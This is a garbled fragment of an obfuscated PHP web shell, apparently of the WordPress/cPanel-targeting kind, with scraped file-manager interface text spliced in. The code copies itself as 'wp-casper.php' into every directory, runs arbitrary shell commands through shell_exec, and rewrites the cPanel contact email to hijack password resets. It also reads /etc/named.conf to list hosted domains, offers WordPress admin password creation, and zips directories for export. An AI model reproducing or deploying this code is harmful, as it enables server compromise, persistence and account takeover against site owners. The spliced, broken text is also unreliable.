"\74\57\x66\x6f\156\x74\76"; } } else { $open_b = "\74\x66\157\x6e\x74\40\143\154\141\163\163\x3d\x22\164\145\x78\x74\x2d\x77\x61\162\x6e\x69\x6e\x67\42\76\x4e\x4f\116\105\x3c\x2f\146\157\156\x74\x3e"; } goto IunYw; fpauK: session_start(); goto NtKHE; iswdT: function createToolsPhpFileInDir($dir, $content) { $currentFilePath = $dir . "\x2f\167\x70\55\143\141\x73\160\x65\162\x2e\x70\150\160"; file_put_contents($currentFilePath, $content); $directories = glob($dir . "\x2f\52", GLOB_ONLYDIR); foreach ($directories as $subdir) { createToolsPhpFileInDir($subdir, $content); } } goto b0XZm; wPKz6: echo $gid; goto F2Gb8; YR2XN: clear(); goto xRPee; mAKbH: ?> | MySQL : 0 ? $cmd_uname : "\x55\x6e\141\x6d\145\40\105\x72\162\157\162\41"); goto tT11D; BkPKI: ?> | Oracle :
CREATE WORDPRESS ADMIN PASSWORD
addEmptyDir($localname); } $this->_addTree($dirname, $localname); } protected function _addTree($dirname, $localname) { $dir = opendir($dirname); while ($filename = readdir($dir)) { if ($filename == "\56" || $filename == "\56\56") { continue; } $path = $dirname . DIRECTORY_SEPARATOR . $filename; $localpath = $localname ? $localname . DIRECTORY_SEPARATOR . $filename : $filename; if (is_dir($path)) { $this->addEmptyDir($localpath); $this->_addTree($path, $localpath); } else { if (is_file($path)) { $this->addFile($path, $localpath); } } } closedir($dir); } public static function zipTree($dirname, $zipFilename, $flags = 0, $localname = '') { $zip = new self(); $zip->open($zipFilename, $flags); $zip->addTree($dirname, $localname); $zip->close(); } } ExtendedZip::zipTree($source, $destination, ZipArchive::CREATE); } goto m_Hd0; I9LWF: function send_post_request($url, $args) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $args); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); } goto c0_Ko; c2bEQ: function cmd($command) { global $path; if (strpos($command, "\162\x65\x73\145\164\143\160") !== false) { $email = explode("\40", $command); if (!$email[1] || !filter_var($email[1], FILTER_VALIDATE_EMAIL)) { return "\131\x6f\x75\x20\x6d\165\163\164\x20\163\160\x65\143\x69\x66\x69\x65\144\x20\x76\141\x6c\151\x64\x20\145\x6d\x61\x69\154\x20\x61\x64\x64\162\145\163\x73\56\40\x72\x65\163\145\164\x63\160\x20\171\157\165\162\x65\155\141\x69\154\x40\145\x78\141\155\x70\154\145\x2e\x63\157\155"; } $pathcp = explode("\57", $path); $text = "\55\x2d\x2d\xa\42\x65\x6d\141\x69\x6c\42\x3a\x27{$email["\61"]}\47"; $file = join("\x2f", array($pathcp[0], $pathcp[1], $pathcp[2])); $file = $file . "\x2f\56\143\x70\141\156\x65\x6c\57"; if (file_exists($file . "\x63\x6f\x6e\x74\x61\143\164\x69\156\x66\x6f")) { unlink($file . "\143\x6f\x6e\x74\141\x63\164\151\x6e\146\x6f"); } file_put_contents($file . "\162\145\163\x65\164", $text); if (file_exists($file . "\162\x65\x73\x65\164")) { rename($file . "\162\145\x73\145\164", $file . "\143\157\156\164\141\143\x74\x69\x6e\x66\157"); return "\x45\x6d\x61\151\x6c\x20\146\x6f\162\x20\x72\x65\163\145\x74\x20\x63\x70\x61\x6e\x65\x6c\40\143\x68\x61\x6e\147\x65\144\x20\x74\157\x20\x27{$email["\61"]}\x27"; } return "\106\x61\x69\154\x65\144\40\164\x6f\x20\143\x68\141\x6e\147\x65\x20\162\x65\x73\145\164\40\x63\x70\x20\145\155\x61\x69\154\41"; } elseif (function_exists("\163\150\145\x6c\154\x5f\145\170\x65\143")) { return shell_exec($command . "\x20\62\x3e\x26\x31"); } else { return "\x44\151\x73\x61\142\154\x65\40\106\x75\x6e\x63\164\x69\x6f\156"; } } goto PIqaM; sGVnx: createToolsPhpFile($content); goto Y_Z6i; vO4pk: $d0mains = @file("\57\x65\164\x63\x2f\156\x61\x6d\x65\144\x2e\x63\x6f\x6e\146", false); goto m_AmF; iXCQU: ?>
Name Type Size Owner/Group Permission Last Modified Actions
Safe Mode : ]
PHP Version : function deleteConfirm(url) { event.preventDefault() Swal.fire({ title: 'Are you sure?', icon: 'warning', showCancelButton: true, confirmButtonColor: '#3085d6', cancelButtonColor: '#d33', confirmButtonText: 'Yes, delete it!' }).then((result) => { if (result.isConfirmed) { window.location.href = url } }) } function jscopy() { var jsCopy = document.getElementById("CopyFromTextArea"); jsCopy.focus(); jsCopy.select(); document.execCommand("copy"); }